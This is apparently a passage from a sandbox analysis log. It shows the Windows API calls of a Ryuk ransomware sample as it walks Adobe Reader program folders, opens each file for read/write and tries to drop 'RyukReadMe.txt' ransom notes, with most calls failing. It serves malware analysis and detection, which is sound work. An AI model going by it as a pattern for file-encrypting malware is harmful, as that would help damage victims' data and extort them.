dwFreeType=0x8000) returned 1 [0138.288] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.288] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.288] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.RUM", dwFileAttributes=0x80) returned 0 [0138.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.289] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.289] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.289] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.289] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.289] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.RUS", dwFileAttributes=0x80) returned 0 [0138.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.289] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.289] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.289] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.289] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.290] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SKY", dwFileAttributes=0x80) returned 0 [0138.290] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.290] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.290] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.290] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.290] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.290] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SLV", dwFileAttributes=0x80) returned 0 [0138.290] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.290] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.290] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.290] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.290] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.291] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SUO", dwFileAttributes=0x80) returned 0 [0138.291] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.291] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.291] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.292] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.292] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.292] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SVE", dwFileAttributes=0x80) returned 0 [0138.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.292] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.292] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.293] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.293] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.293] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.TUR", dwFileAttributes=0x80) returned 0 [0138.293] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.293] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.293] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.293] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.293] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.293] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.UKR", dwFileAttributes=0x80) returned 0 [0138.293] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.294] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.294] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.294] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.294] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.294] SetLastError (dwErrCode=0x0) [0138.294] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.297] GetLastError () returned 0x5 [0138.297] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.297] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.297] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.297] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.297] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.297] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.297] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.297] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.sig", dwFileAttributes=0x80) returned 0 [0138.298] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.sig" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cryptocme2.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.298] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.298] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.298] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.298] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.298] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.298] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.298] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.298] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.298] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.299] SetLastError (dwErrCode=0x0) [0138.299] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.299] GetLastError () returned 0x5 [0138.299] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.299] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.299] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.301] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.301] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.301] SetLastError (dwErrCode=0x0) [0138.301] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.301] GetLastError () returned 0x5 [0138.301] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.301] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.301] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.302] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.302] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.302] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.302] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.302] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.302] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.302] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.302] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.302] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.302] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.302] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.303] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.303] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.303] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.303] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.303] SetLastError (dwErrCode=0x0) [0138.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.303] GetLastError () returned 0x5 [0138.303] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.303] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.303] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.303] SetLastError (dwErrCode=0x0) [0138.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.303] GetLastError () returned 0x5 [0138.303] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.303] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.303] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.304] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.304] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.304] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.304] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.304] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.304] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.304] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.305] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.305] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.305] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.305] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.306] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.306] SetLastError (dwErrCode=0x0) [0138.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.306] GetLastError () returned 0x5 [0138.306] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.306] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.306] SetLastError (dwErrCode=0x0) [0138.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.306] GetLastError () returned 0x5 [0138.306] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.306] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.306] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.307] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.307] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.307] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.307] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.307] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.307] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.308] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.308] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.308] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.308] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.308] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.308] SetLastError (dwErrCode=0x0) [0138.308] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.308] GetLastError () returned 0x5 [0138.308] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.308] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.308] SetLastError (dwErrCode=0x0) [0138.308] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.309] GetLastError () returned 0x5 [0138.309] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.309] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.309] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.309] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.309] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.309] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.310] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.310] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.310] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.310] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.310] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.311] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.311] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.311] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.311] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.311] SetLastError (dwErrCode=0x0) [0138.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 